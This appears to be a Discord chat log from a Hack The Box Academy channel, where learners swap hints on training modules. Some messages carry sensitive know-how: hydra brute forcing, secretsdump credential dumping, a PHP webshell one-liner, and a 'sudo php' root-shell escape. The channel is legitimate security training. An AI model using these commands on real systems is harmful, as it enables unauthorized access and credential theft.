This is drifting off topic

From what ive heard cpts is harder than oscp

It's my first step in security !

Let's get it back to module chatter

Fact never done it cuz i knew it was pointless

What is noah gang in ur bio cuz thats my name?

There are other channels where cert discussions have been had #careers-and-certs but you need to verify your main htb account following instructions in #welcome

And tcm security have a good course for ethical hacking

Ztm too

Noah is birb

Injections or sqlmap?

Wait nvm

No labs tho

Have you learn about burp suite metasploit, johen dhe ripper or not yet

Yes i have

Did you steal the hash?

Its complete course 25 hour

Ik ive done it

Me too nice

Anyway they said no cert dicussion here dm me if u wanna talk abt that

About what sorry

Hacking?

For that i have born ready

Oh cert sry

If you read #welcome you'll find out how to access more of the server btw ;)

I will do maybe but not yet

btw can someone please help i mean they always be doing this making it harder for no reason could have just logged in as adunn and then it might run ok with no issues

After updating perms log out and log back in

ill give it a go after the gym then

thanks

And one last thing htb academy is more theory to read and htb lab or main its for challengers and labs?

Academy develops skills, labs test them

Each module has a skill assessment at the end that ties each section together from it

the courses have so much reading and i literally cannot read

Like tryhackme

Skill issue

try hack me is more of walkthroughs

Yea

I will try htb for offensive

Thx guys

Did you uh, yknow, get the password from the hash?

You have all you need then

You might have to use an extra flag in the connect command

-local-auth i think it is or -windows-auth

guys how much python/networking and all should I know before getting into hacking, CTFs real time vuln machine exploiting/hacking etc

Like, I can still keep on learning it down the road

should defo know networking in my opinion but tbh u can learn as u go

yeah, Im refering to some resources and THM for networking. And ik fundamentals of python, so Ill just go for CTFs and such

Learn as I go like you said

Anyways, thanks for reassuring

Basic Networking is a must

if u dont even know what an ip address is yeah

right

Knowing the basics of what CIDR notation is and what it means is super useful

alright. Ill make sure to look into it

And by CIDR, I bet you mean Classless Inter Domain Routing? Googled it btw

Yes

alright, cool

Good evening, i am stuck on Module Web Attacks,Section:Skills assessment, i have enumerated a api,|| have found tokens and users,|| but how can i understand who is admin? first one? can anyone give some nudge how to do this? I had no problems with the modules

read

and you will notice

yeah with token i can force to change password, but there is a cookie which is random and im getting a access denied

one user is admin

just read

and enumerate

oh ok, thank you sir

Password Attacks - Hard Lab, most optimal way to bruteforce this one?

hydra with 4 threads is killing me

Why not more threads?

Like 48

it defaults to 4

when using rdp

I dont think I bruteforced rdp first but I could be mistaken, been a minute

probably smb is better which is the other protocol being used

lets stick to cme with some threads

well i have found a admin user, here im trying to change a password, but access denied, is it because of PHPSESSID?

you really have to put a lot of work

if you want to improve

the way to bypass that is literally explained in the module

@sly dome ur tip worked. thank bro

you're right, maybe I need to reread the module

any time

Ha, I've another silly question. I've already got the answer (I think); Question: "Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)".

I already find the 88 character cookie, encoding the cookie "3dac93b8cd250aa8c1a36fffc79a17a" (previously decoded in ASCII Hex, and Base64), replacing the last character "a" with the payload list. Then, in the payload processing, I set it to encode the payload list data to Base64, and then to ASCII Hex again (just to give you an idea, it would be something like: 3dac93b8cd250aa8c1a36fffc79a174d413d3d, with '4d413d3d' being the payload list data, already encoded) , after that I just restarted the process, replacing the previously decoded cookie (a8c1a36fffc79a17) with its raw version (4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a63355954 4533) Thus obtaining the 88 character cookie. No mystery so far, however, there are 62 results, would I have to copy and paste all the results into the htb input??

sorry for the long text

No you should be automating it

burp intruder or ffuf

question what would happen if i was to unenroll my chrome ook from school?

Someone knows why, in the smtp module, when looking for the username, using the provided list , only with metasploit the username is found??

Hi all. I am confused why I can't read the flag, I added myself to the Domain Admins group.

I am on the Windows Privilege Escalation/DnsAdmins section.

@hallow kiln very cool module dude

but i missed some more AD stuff i guess they let it for the other module

I reset the machine did all the same step, still access denied.

Not done it but I did a module today where even because I was admin it didn't give me access to a specific resource. I'd enumerate who has access to the object you're trying to access

Usually HTB place flags in specific users directories so maybe enumerate that user and see what principals have privs over them

but it says the flag is here: Submit the contents of the flag located at c:\Users\Administrator\Desktop\DnsAdmins\flag.txt

The answer is really the cookie with 88 characters? This is my main doubt

3rd question in webproxie module.

last session

it is explained somewhere in the modules for sure

it is something basic from windows groups changes

well thanks

the answer is the 31 chars value

and after that the answer is a flag of the type HTB{flag}

a flag

make ur own list with the original cookie and the missing ascii encoded base 64 encoded last characters. run all 62 and check the response render

something like that?

cookie=4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a633559544533§x§

Hey Guys I'm in "Password Attacks " : "Password Attacks Lab - Hard"
got the credentials of user d cracked the Logins.kdbx
but I can't use this credentials for anything ,
I have tried to connect with evil-winrm as david (didn't worked out ), tried to do xfreerdp as david (didn't worked out), tried 2 access the folder of administrator & david (didn't worked)
can someone give me a hint please, not sure what else to do

The payload list will be encoded in Base64 and then ASCII Hex. It's right?

are u checking all the responses and making sure it is appending the original cookie + missing encoded characters

Yep

I ask twice some question and it was deleted automatically. Can somebody tell me what do i need to do ? I asked for some hints and got deleted

smb has a network share called david

ur payload options list needs to be modified so that all 62 iterations contain the 31 +1 character

no

so the best way to do it is

cookie=burppayload

and then in intruder options add a prefix to all values of the list

the prefix is going to be the 31 chars obtained before

also in intruder select post processing options to be the correct encoding’s

The original cookie you refer to and before it was decoded? In the case "4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a6335595445334d513d3d" original and "3dac93b8cd250aa8c1a36fffc79a1 7a"? If yes, then yes. I'm using the original cookie (88 characters long).

you can do this 2 ways both make a new list with the 3dac93b + normal character u will copy and paste the 3dac93b for each chracter this is ur new list to run

or u can make a new list with it already encoded 4d32526 + each encoded missing character x 62 times in this version u remove the encoding rules since its already encoded

Wait, the character that will be altered Isn't that the "a" at the end in "3dac93b8cd250aa8c1a36fffc79a1 7a"???

no

it’s appended

Holy shit

read the question

I lost 5 hours due to lack of attention

it be like that

not 31

a17aa, a17ab, a17ac, etc etc

until then I thought it was to replace the "a" at the end lol

something like that: cookie=4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a63355954453359513d3d§x§ (here will be the lists of encoded missing characters.)?

look at ur PMs

Anyway to fix this error?

yes turn your phone 90 degrees

alt, take a real screenshot

Managed to fix it

SERVER-SIDE ATTACKS

Nginx Reverse Proxy & AJP

I'm struggling to setup the Nginx Reverse Proxy. Here is what I did:

1. went into the /etc/nginx/conf/nginx.conf
2. Commented out the server block
3. Added the following in the http block

    server <TARGET_SERVER>:8009;
    keepalive 10;
    }
server {
    listen 80;
    location / {
        ajp_keep_conn on;
        ajp_pass tomcats;
    }
}```
4. Started nginx and curled: ``curl http://127.0.0.1:80``
5. I get an error:
```<html>
<head><title>502 Bad Gateway</title></head>
<body>
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/1.21.3</center>
</body>
</html>

Can anyone help please? No clue how to fix this

check the logs

you will have to troubleshoot

Sorry for this noob question but how do I check the logs. And when I do, what am I looking for?

nginx logs

What am I supposed to gather from this

are you listening on port 80

netstat -nat

also the error is from the server

double check the nginx conf server to match the exercise ip

I tried to restart nginx sudo systemctl restart nginx.service and I get all this error code. Do u understand it?

I think I should skip this shitty part

I'm not learning to become an nginx professional

I just want to hack things

This is so stupid

why did you use ajp_pass and ajp_keep ?

sometimes you will have to connect through ajp proxies

🤷‍♀️

I didn't know I'm using those things. I'm just following the module tutorial

Did u do this module already?

try with proxy_pass, No i didn't

i literally followed step by step

and it worked like a charm

i did under Parrot OS on a local VM

Okay so I need Parrot OS for this?

no

i just say that maybe you miss some step

How come when I use sudo systemctl stop nginx.service it doesn't actually stop... How the hell do I stop the service?

Do I keep restarting my VM to stop it XD

nginx -s stop

is the command

you should start googling stuff you dont know

Why did you set the port to 8009?

Because in the module it said to leave the port at 8009

I don't think it did. can you send a screenshot of that

You have to use the port spawned with the box

Can I screenshare to u? I think I am editing the config wrong

yes it mapped to the 8009

so you have to use the port given in the exercise

Note: In the following configuration, we are using port 8009, which is Tomcat's default port for AJP, and this is how we would use it in a real environment. However, to complete the exercise at the end of this section you should specify the IP and port of the target you will spawn (they will both be visible right next to "Target:"). The port you will see is essentially mapped to port 8009 of the underlying Docker container.

READ issue

I already tried with the machine PORT. It is a problem with how I change the config

nice, with that out of the way, the rest of the path should be a breeze 😁

how should i face VULNERABILITY ASSESSMENT

shitty module o.O

Try harder

(now u will never help me again I think)

?

ill help if i can help

Thanks

Just do the thing, the tool skill assessments have preloaded scans on the spawned ip

very interesting in the end

i expected it to be worse

It's honestly more about teaching how to read the results than using the tool

im still in the first part

the standards part is nice to know

some stuff that can help you in interviews xD

Mhm

I just felt it was lacking in terms of verifying results

as i understand with the vuln assessment you dont have to exploit the results?

Nope

sometimes the client can ask you to do it but generally it says just run this and report that

xD

Just surface level

well is a good starting point

probably if you have a baby company and you hire a pentest, it will just find a lot of flaws

well, good informative module

at least the brain can relax with this one

Vulnerability assessment should come before any full pentest

yyy

Vuln assessment > attempt triage > pentest to see if triage worked

I’ve only just started with HTB, and there’s so much I want to do already

If you're doing academy: infosec fundamentals path is a good way to get started

I now think I need to use a brute forcing tool like john to find crack the hash value that I found in the nmap results . I thought the hash type would be sha256 but my research on that hash type shows that they cannot detrmine that

That's not going to be helpful

You need to start somewhere else

the john tool or the RSA value I found from the nmap results?

Different service entirely

Also you don't need to unhash an rsa key generally

Did you only do port 22 for your Nmap scan?

Nope. port 21,22, 139, and 445

Then why are you focusing on 22?

:)

RSA is not a hashing algorithm

You have a username, and password list

Gotta bruteforce it

I know that I can use the mut_password.list as a wordlist

Yes

And you can just use sam as a username

@cedar void think twice what you are doing

the question is just asking you to find the password of the user sam as taught in the above section

from here you have to conclude that you MUST bruteforce sam's password

how? network, you have ssh and ftp and we know from experience and the previous section itself that ssh bruteforce is one of the slowers and can be locked

and very likely sam as another lazy human more in this planet, is reusing his ftp password

that kind of thing has to be on your mind

^

It WILL take time

this is only a virtual enviroment but dont think real enviroments are not reusing passwords

Most common is {importantNoun}{importantYear}{symbols}

That's irrelevant to this excercize

Or for the truly lazy SeasonYearSymbol

also you are trying to crack a rsa signature

which is absolutely a non sense

That's companies defaults

💀

it fkn happens in real world hahah well...

It shouldn't be anyone's default

welcome123

imagine

Welcome1!

My guy told me I gotta know Linux well for security

It's too overwhelming man. I'll try a vm first before I fully migrate to linux

No one says you have to migrate to Linux

Vm is smarter anyway

I daily drive Windows and use Linux for small stuff ¯_(ツ)_/¯

if it was only Linux 🤣

I hate furries

Congrats

out of context totally

Nobody asked

I hate mfing furries

wth

They've been saying it like every few hours

a

Why haven't they gotten the kick yet?

Because they didn't receive enough love and affection growing up

i see HAHAHA

The operating system does not matter at all. Either way, you have to know Windows and Linux very well.

It was drowned out earlier

What are you guys talking about today friends

Academy modules

i refuse to answer

And that'll be the same until the heat death of the universe

What is that ?????

i wont get people disturbing random discord servers they dont care about

like get a life

They don't have a life

lol

😑

If only there's a #welcome channel that describes what the server is about

If you don't know what that is, this is the wrong place to be

^

I know what is that

It is about hecking

Ayo dawg got that drippp

🥶

i have totally no idea bout the scenario but aren’t protections in place?

Dude just dropped the coldest messege and didn't even give us a blanket

Get out, so people can actually get help and not have their posts drowned out

Anyway this channel isn't really for idle chatter

Thank god, I was stressing for no reason then

Sorry

Still good to know the basics of other OS

academy definitely has some issues, missing recaptcha, emails going out with variables not filled out

Please reach out to support

💀

Pwning, can something be done about this joker here

If you wanna just shitpost make an account on app.hackthebox.com and verify via the instructions in #welcome

Sorry

Sorry

You'll gain access to more of the server

No shitpost starting today

🫡

Let’s change topic please

Ok

Ima gonna sleep

Bye

any ban hammers

Dw

Dealt with

lots of hammers

Thanks

good night guys

Probably best to repost so people can see it, now that there's no more spam

I'm going to post in community help, but good call

Posting here is the better place

As it's an academy module

Are you sure your entry point is correct

As in EIP?

I'm not familiar with asm so I guess

I just mean your buffer before your instructions

Haven't done the module, but is it really LPORT:1234 in your command or a typo here? Not sure that's valid for specifying the port, LPORT=1234

RPORT = target, LPORT = you

Before my instructions, I'm confident. I'm not sure if there's an issue in my shell code or there's an issue with pwn box and this assement

Good call, I'll take a look to see if that was the issue

Infosec fundamentals does seem like a good starting point

Very general and good knowledge

That was the issue (- _-;) . Three hours over a colon

So thank you very much for the help

It happens, the tiniest misstep in syntax and then it's hours of troubleshooting, glad you got it now

No semicolon in mysql query

Delete your original help message as it spoils

Done

❤️

But congrats on the w

Hey everyone, I just joined Hack the Box. I am in the academy sessions (modules) and I am in the firefox machine—I doesn't want to load though; keeps saying it timed out. I did the best troubleshooting I could with it and still could not find why it's saying that. Could anyone help? thank you!

What module are you working on?

The pwnbox has limited web availability if you're not subscribed or pay for cyoobs

Hi guys. If I setup a ftp server on my localhost, and want to port forward to a ssh remote host (pwnbox), when I do ssh -r 2121:0.0.0.0:2121 htb-student@pwnboxip, i see the port show up on localhost but the port is not open if we use other IP of the pwnbox...

I am on the 3rd one. Just started a few minutes ago . it wants me to go to firefox and go to the target URL.

any idea how i can run a local ftp server, and make a internal ssh host open up the port so other victim machines can talk to it?

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

What module is that for

Modules have a name, so do sections

^

just in general i want to play around. I am in the AD module and want to see if i can get hashes out of ntds.dit, and the file is large

trying to do file transfer i guess.

You also don't need the pwnbox to access the website it gives you ip:port

Then just do file transfer, why make it more complicated than it needs to be

I'm not that advanced. I'm just following along for right now. I don't know what pwnbox is. can you point me in the right direction?

pwnbox is a attack machine they setup for u in the cloud and you can control it fully in browser

Pwnbox refers to the in-browser vm

It's titled "interactive session with target." I want to understand this but i feel lost.

again, which module and section?

You're doing the getting started module then

The module name is all the way at the top

@n @fathom pendant I have not that much knowledge on all of this. However, the firefox VM that it is giving me is the pwnbox?

Sorry intro to academy not getting started

Hold on I'll explain with screenshots since you're a little dense

Yes. The getting started module. I have no good foundational knowledge of this so far. So I can't be of help while looking for help.

On the Active Directory Module, Skills assesment 1, there is a question "Find cleartext credentials for another domain user" I did this before and was able to find the password and the user. Using the same method and trying a lsass dump, this time I dont see the password listed (null). Can anyone help me out here? I have clear notes on how I did it last time and it does not seem to work now? Thanks!

Start Instance is the pwnbox, spawn target is spawning the interactive target

If you're trying to use the example they provide you in the text above that part, you'll get nowhere

The 157.x.x.x:port in the example is not what they want you to attack in this section

It is purely example

@fathom pendant I guess I don't know. When the screen loads, it just says Firefox has timed out. I'm not sure why.

I'm feeling generous rn

Dm me screenshots of what you're trying to do

Did you click the button that says "Click here to spawn target"

I don't see one. I am trying to post screen shots

Like I said to post screenshots you need to verify your main account following #welcome

You can also just dm me

You can dm without sending a friend request

Well, I sent one anyway. I'm not the best at discord. I guess anything as of right now. lol I'll send the screenshots in a moment

Can anyone help me with Server-Side Attacks - Skills Assessment?

If you provide general examples of what you tried (without spoiling) it's more useful

Also don't spam your question

You didn't even give enough time for anyone to answer you before posting in other channels

check javascript code

This server is based upon, how to hack technicilii?

Read #welcome and #rules

Too much to midify, break it down slowly?

I have checked the js. After deobfuscation, there is a url. I did not find anything else useful later.

No. Learn to read

Fuck no.

Then you have no business here 🤷

Damn I got 1984d, understandable

👀

hi im stuck in AD BLOODHOUND skill assesment last question
Find the percentage of users with a path to GLOBAL ADMINISTRATOR
i tried bloodhound cheatsheet with Find the percentage of users with a path to Domain Admins
i break some query to get:

• Users in domain inlanefreight.htb = ||15||
• Users that have path to domain admins = ||3||
  then divide it, but got wrong answer
  am i on right track ?

Ahh yep I did have both open.. will check that out tonight

my brain is a bit fried right now but if you still need help with this shoot me a dm

gentle reminder to RE-READ all questions so you don't waste hours like me. PSA over.

You do actually answer it in percentage? Not just divided?

i do percentage after divide, already solved

Is anyone up?

No

I'm down

Read #rules and #welcome

Also no one is gonna dm you if you don't say what your issue is

Mhmm

What is your 'important issue'

Eh it’s hard to explain here Nevermind /:

Then it's not important enough, bye

Can anyone help me on the last question for Windows Privilege Escalation - Pillaging? I use the password to restore the backup but it says its wrong.

nevermind I got it

It wants Bitcoin
Look at the profile

Oh I know

I was taking the piss, as they say

yeah that was weird, theyve been here for a couple years and thats all they said

are they impersonating her? That is a real person in Alabama

I wasn't gonna dig into it

Meanwhile Marcie is in her dms paying btc for her feet

Nah homie

You don't even know the part where he's your homie.

?

You good?

Is that the best you can do?

low effort

How can someone see competence if one can't even see basic contradiction?

Talk about low effort.

Like what did I do to you to have you be like this?

Lol

Nothing, it's just trolling.

Yeah, low effort

Overreactive one.

And boring

That's probably just your defence mechanism.

Nah, I honestly don't give a shit

Hope that's the case.

Anyway enough toying around <@&861185840277487616>

Well he is dealt with quickly

Ping and a BAM

Tbh I was lowkey hoping he'd at least try a little harder

His comments removed

Let’s get back on track

evaceppt info.up stackreel.istack.nar.4low expire.null4.yiststackniiu.info.qai.isource. i.anonxczvstargkldsx.xclose.8.50.orders.logic.ireports.mint.root.i.hub.lan.outbound-only.strict.$!?.*@=™.over.i.ti.expire.onall@solved

What

hey guys, trying to finish the knowledge assessment for the getting started path.
I 've (once to use msf to exploit the RCE Vulnerability on the machine.
I had to log out. Came back in again and tried the same again aaaand NOPE.
On the first try I performed an exploit check and msfconsole said the target is vulnerable, even got shell access and found the 1st flag,

I 'm trying to do this from scratch now, and can 't even get any of the 2 exploits to work I mean I get -> thetarget is not vulnerable.
(I ve set correct RHOSTS,RPORT, LHOST,TARGETURI)

You might need to respawn target

tried that too. Hmm.. ok I 'll give myself a 10min break and respawn the whole box

@fathom pendant I 'll let you know if this time works

I also have a different kind of question.
While setting options within msf.
For example some exploits have mandatory fields that MUST be set in order to work.
So if someone/some target has USERNAME but blank/no pass, how can I set it as an option in msf?
It gonna be like: set PASSWORD '?'

You might be able to get away with ""

As the password

you mean literally <"">

Yes

oh nice thnx 🙂 I should check this thanks @fathom pendant

Imo the skill assessment should be reevaluated for exploiting web vulnerabilities in thick-client application or at least provide a bit more context before hand

Hi
https://academy.hackthebox.com/module/80/section/781
I am a rookie and have no idea when doing this skill assessment. Can you give me some detailed tips?

use the content of the module as explained

enumerating users can be a good start

and then?

🤷🏻‍♂️

do your job

pointless if i give you a detailed step by step

solution

ok, thanks

Which wordlist should I use? /usr/share/commix/src/txt/usernames.txt?

nope

read the information provided on the website

which website ?

I'm sorry. I'm a rookie

are you in the skill assessment?

1. Being a "rookie" doesn't matter
2. why are you doing a tier 2 module if you're not confident in your skills

i mean you asked about skill assessment but you sent another section url

im now confused

How long does it take this command to usually run?

20 minutes took for me

Do -t 48 it'll speed it up exponentially

I added that

You did capital T which I don't think affects the threads

oh okay

^

Your output only shows 16 threads is why

sorry, this url https://academy.hackthebox.com/module/80/section/781

personally i used 64 threads

from which 58 survived and tool around 20 minutes

Yeah which is why I recommend 48

use the hint

You don't get any loss

but 58>48

The losses can skip over the right combi

some threads just get connection issues it doesn’t mean you are losing tries

And taking more time rerunning it

So this instead ?

Yep now you see how it says "max 64 tasks per 1 server"

i dont think so, hydra doesn’t leave any combination without test

It won't output

what

thanks

@fathom pendant you miss maxipal?

Who?

maxipal

Obviously if I'm asking. I didn't care enough tbh

miss him?

why did he get banned for 10 years

No fuckin idea, I'm not admin or staff

Probably said something stupid

Also completely unrelated to this channel

You'd need to rerun the command for it to reattempt the dropped packets, and if the password combo is in one that was dropped: you're spending more time trying to figure it out than it would be running it slightly slower, but more stable

Because more threads means more of a chance you dos the target

i don’t know how it works exactly because before starting the attack it determines how many threads are healthy

i ran it once with -t 64 and it went down to 44 threads

One message removed from a suspended account.

One message removed from a suspended account.

One message removed from a suspended account.

One message removed from a suspended account.

Not related to modules read #welcome and #rules

hello everyone! How to dump lsa secrets locally? I have following command: python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL is this right?

because it shows only password of user but not the user

with crackmapexec remotely it shows user:pass

Am i doing something wrong

(Unknown User):Password123

Module and Section?

Footprinting
Oracle TNS
Footprinting
Oracle TNS

Module:Password Attack; Section:Attacking SAM thx

Did you try dumping LSA Secrets with Crackmapexec

Follow the section step by step

@fathom pendant with crackmap remotely it works and i get user:pass! but locally it only shows password; guess i followed the section

just wondering about different results remotely vs locally

I don't think you need to specify LOCAL

But I could be wrong

@undone narwhal yes this method works

@fathom pendant local is required

it always says unknow user through SAM for some reason may be it dont cache the user name, and i think the crackmap exec literally dumps the lsa secrets hence you get the user name and password

@undone narwhal thought cached username should be in hklm\security so secretdsump should get that: secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

but nevertheless thx

yes security hive stores the lsa secrets, maybe the secretsdump and crackmapexec uses different methods to parse the registry hives

ok thx

you can use -debug

with any impacket tool

and see what is happening

i cant reproduce your problem

used impacket 0.12.0dev and nxc dev branch

got the same result with both

probably has to do with your impacket version

ok i give it a try

I have a question regarding "Introduction to Network Traffic Analysis", for layer 5-7 topic, one question is "FTP utilizes what two ports for command and data transfer? (separate the two numbers with a space)"
I tried '20 21' and '21 20' but it says it is wrong. Have I mistaken ?

Hello there I am learning assembly x86_64 in the academy, and I am doing the chellange of this section., https://academy.hackthebox.com/module/85/section/877.
I need to get the contex of rax register at <_start+16> but when I break there and try to get the info of that register using x/wx $rax, it gives this error:
0x21796d6564637708: <error: Cannot access memory at address 0x21796d6564637708>

check trailing or/and leading spaces

iirc the answer is 20 21

Thanks, it was indeed a space problem

The error message you’re encountering, “Cannot access memory at address 0x21796d6564637708,” suggests that the memory address you’re trying to access might be invalid or not accessible. To resolve this, you should ensure that you’re breaking at the correct location in your code and that the value in the RAX register is valid at that point. Double-check your breakpoints and the context in which you’re trying to access RAX. Additionally, ensure that you’re debugging within a valid memory range.

I hope I could help.

Hello guys

I'm stuck at the IPMI service in Footprinting module

What have you tried and what is your issue

The question is whats the accounts cleartext password

(My best guess is you're not using the right hashcat mode)

Using msf i did found the hashes

Mhm and you need to dehash it into plaintext

Yes

And how should i do that?

read the section

its explained

use an appropriate dictionary

The hashcat mode

Says it'll take 14 days to dehash it

the one the section uses

it took me less than a second

Ayo

You're using the wrong thing then

but use the correct dictionary

you dont have to brute force it

its dictionary attack mode

You shouldn't be using the ?1?1?1?1?1 mask either

yea i remember now

the section doesnt show dictionary

but just use THE dictionary

There is a wordlist in resources

true

but for this case

the rockyou worked for me

dont know if the password is in the resources’ one

Hii

Am i supposed to save the hash in a txt file?

@glacial dragon think the brute force mode is for HP devices

you dont need format

echo "hash" > ipmihash

Found it

Rockyou worked

Thanks man🤝

any time dude

can't agree more dude, it took me a few hours to solve the easy one using tips here. the medium just time consuming in that you need to try the creds on SSH. the Eeasy lab had more steps to solve, and had some document reading to concude rev shell is the way to go.

Hello everyone
I'm having some trouble with the Getting Started module in the Public Exploits section.
I'm doing the activity at the lesson, but I can't even scan the machine to see what ports are open. I keep getting this error. Any input on what I could be doing wrong is greatly appreciated.

tell me what have u done or dm me to help you.

that's a docker container and you can't scan or ping those

youre provided the sole port you should be interacting with there. 57436

good thing your syntax was wrong, full scanning a public IP like that can be rude 🙂

Hello in the Linux Fundamentals module Permissions section there is

-rwxr-x--x   1 cry0l1t3 htbteam 0 May  4 22:12 shell
We can then apply read permissions for all users and see the result.

  
cry0l1t3@htb[/htb]$ chmod a+r shell && ls -l shell

-rwxr-xr-x   1 cry0l1t3 htbteam 0 May  4 22:12 shell

shouldnt the other have read permissions after a+r?

wdym other

wat?

it has

o yeah

USER-GROUP-OTHERS

yeah yeah

xD

👌

need a coffee

the reading issue

thanks @sly dome

very common around here

(jk)

(no you're not)

Attacking Common Applications: Thick Applications - I cant work out how to get the correct address in the decompiler

Can anyone help me with "Working with IDS/IPS" -> Skill Assessment - Suricata?
The alarm gets triggered, but I don't know how to find the payload?!

am i allowed to ask basic questions here for javascript deobfuscation module?

No only complex questions about the meaning life are allowed

lol

Just ask your question

And provide what you've attempted so far

I literally just breezed through this module the other day

So it's fresh on the brain

Once you find the JavaScript code, try to run it to see if it does any interesting functions. Did you get something in return?

I was able to locate the js script with curl command

What section is this? The skill assessment?

used grep to filter for js

skill assessment

OK so you remember how to find the script yeah?

hey i am new, where should i get started?

And what the path would be

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

ipaddress/api.min.js

Shbingo

https://imgur.com/a/uF2aj8n

so this a no brainer thing?

Use wget to download it

Or visit the page in browser and copy/paste

ohhhhh

i have it downloaded now with the wget command

Hello again, still stuck on user4 of Intro to Windows CLI Module - Skills Assessment. I've discovered one cmdlet that allows me to compare 2 files, but after going through the entire module again, I'm not sure how to use the command to compare more than 2 files at the same time.

This one you simply run it, iirc you can run it via nodejs but I used an online compiler

They'll both output the expected flag

Should I use resources outside of the module?

thank you!

whats iirc?

Iirc is just shorthand for if I recall correctly

lol, i was think to run it from command line like running a python script "python myscript.py"

shoot me a dm if you still need help (this is going to be long)

peffect, got it

You can and you can see the output flag which is funny

thank you

Now just gotta unpack it :3 which tbh isn't that hard to do

If you wanna continue the cli route just change the last return [variable] to console.log(variable)

What am i missing or doing wrong?

I have found access as www-data and found out:

User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php

So I naturally tried:

www-data@gettingstarted:/$ sudo -u root /usr/bin/php <?php system($_REQUEST["cmd"]); ?>
<oot /usr/bin/php <?php system($_REQUEST["cmd"]); ?>
bash: syntax error near unexpected token `('

hey! I'm a little stuck with this excercise. I tried search an exploit using google and with searchsploit, but no luck. The target system is running an apache server. can someone give me a tip or help me in any way? Thanks

Did you do the gtfobins script?

Nmap will get you nowhere as this is running on a public server. You see that its a web server, what's thr next logical step?

(I literally just helped someone earlier with this)

Once you figure the next step, it smacks you right in the face with what to do after that

I have no clue how to use it. As I am logged in with a www-data account. The modules teached that if it says ALL:ALL no password. I could use that service without needing a sudo password.

In order to take advantage of it, you need to use sudo, also part of your issue is using the <> as bash interprets them as redirects

You should encase the php code in single quotes

need some help/hint on how to get logrotten onto target system or do i not need to do that at all, module is linux privesc

But also

Gtfobins gives you a simple script to use since you do have sudo rights on the php binary

Well really it's a one-liner

There's many different types of file transfer methods, there's even a whole module dedicated to it

This was it. Damnit! Thanks a lot!!

I thought that since i said /usr/bin/php it would understand that from that point it was php code

CMD="/bin/sh"
sudo php -r "system('$CMD');"

damn. I fount it lol. Thanks!

you are right

;)

Usually am when it comes to the basic modules

Nope because you're still running it on the bash shell line

@shrewd hazel ask before you dm me

Lol I don't get notified of message requests so it just hangs out there until I look at dms

hjelp

im stuck

on module Information Gathering - Web Edition section Active Subdomain Enumeration 2nd question

this is the command i used

nslookup -type=any -query=AXFR inlanefreight.htb ns.inlanefreight.htb

# Host addresses
127.0.0.1  localhost
127.0.1.1  parrot
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
# Others
10.129.201.211 inlanefreight.htb
10.129.201.211 ns.inlanefreight.htb

this is what my hosts file looks like

i counted 19 and i answerd 19 but its wrong

help

Just use the ip instead of ns.inlanefreight.htb

You can also put multiple hosts on one line btw

Just delimited by a space/tab

ok

It's dumb but that is how it be

i did tha

Also what exactly is the issue you're running into :)

Cause that seems correct to me but it feels off

;; XFR size: 22 records (messages 1, bytes 594)

is this the answer?

No

Is this the all A records question?

nope

Zone number?

• 1 Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.

yessir

It's lower than you think

Not every subdomain is also a zone

how do i know the subdomain im looking at is a zone

Think about what a zone must have.

oh my gosh

i am so stupidddddddddd

adsadsaddad

i am so sorry

It's ok

no problem

The module doesn't really do a great job at explaining it tbf

lol

what confuses me is that the 2 zones are the same thing

both are inlanefreight.htb.

Because those aren't the 2 zones

:3

???

That's one of the zones

inlanefreight.htb. root.inlanefreight.htb.

these are the zones?

Nope

????

Inlanefreight is

the root.inlanefreight is the mail address

ns?

(Root@inlanefreight.htb)

Hey guys I'm in module "Attacking Common Applications" ==>> "WordPress - Discovery & Enumeration"
last Q "Find the version number of this plugin. (i.e., 4.5.2) " ,
I went into the page ||http://wordpress.org/plugins/wp-sitemap-page || but I didn't find any ||readme.txt|| or anything like that ...
can anyone give me a hint please

ill have to loguout now so i cant talk, sorry

If you look at the output you can see that it dives into one of the subdomains a but deeper

Which is your other zone in the server

Isn't there a general

Nerd

If you read #welcome you can figure out how to find it

Nah

Also good job on coming into a tech/hacking related server and calling someone a nerd, clever you are

I didn't call u a nerf what

WHAAAT HOW DID MY MESSAGE GET REPLIED TO YOU

Sorry man

Trust me I don't take shit seriously most of the time here

Bro today some guy called me and threatened me and all

Then he told me my namr

But on a real note, read #welcome and follow the instructions to gain access to more of the server like #general (it'll say no access)

And cursed me

What should I do

I live alone

This channel is for discussion of the learning modules found at https://academy.hackthebox.com

Call cops, report the number

¯_(ツ)_/¯

I did

But he then told my my address

hi, can someone help me?

Yo what happen

Again that's unrelated

What is it about?

Just ask your question, be mindful of the #rules

well, wrong chat sorry

Huh

i wanted help with a box but this is not the chat xd

#boxes

no acces

You'll have to follow instructions in #welcome to access more of the server

It says no access

I swear people don't fuckin read

Read and follow #welcome

Ok bro

I've said it multiple times in the last 5 minutes

^

To gain access to the rest of the server, you need to verify your https://app.hackthebox.com account following the instructions in #welcome

friki

Hey can anybody help me hack

I am a beggener

And i need to learn>

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

well no one is in this server and im so fucking tilted xd ill ask here: the problem is when i press intro ^M appears and i cant execute any fucking command

Thx

It looks like your shellcode is whack ^M is the equivalent of carriage return (or \r)

Usually inserted with the ctrl-v, ctrl-m

yeah, i know its wack

the problem is solving it

?

Maybe using other tools can help? Haven't done this module myself

also #boxes

tu muertos

s

💀

sorry english channel

xd

#rules number 5

they already told you elsewhere that you need to upgrade your shell, this is the wrong channel for this

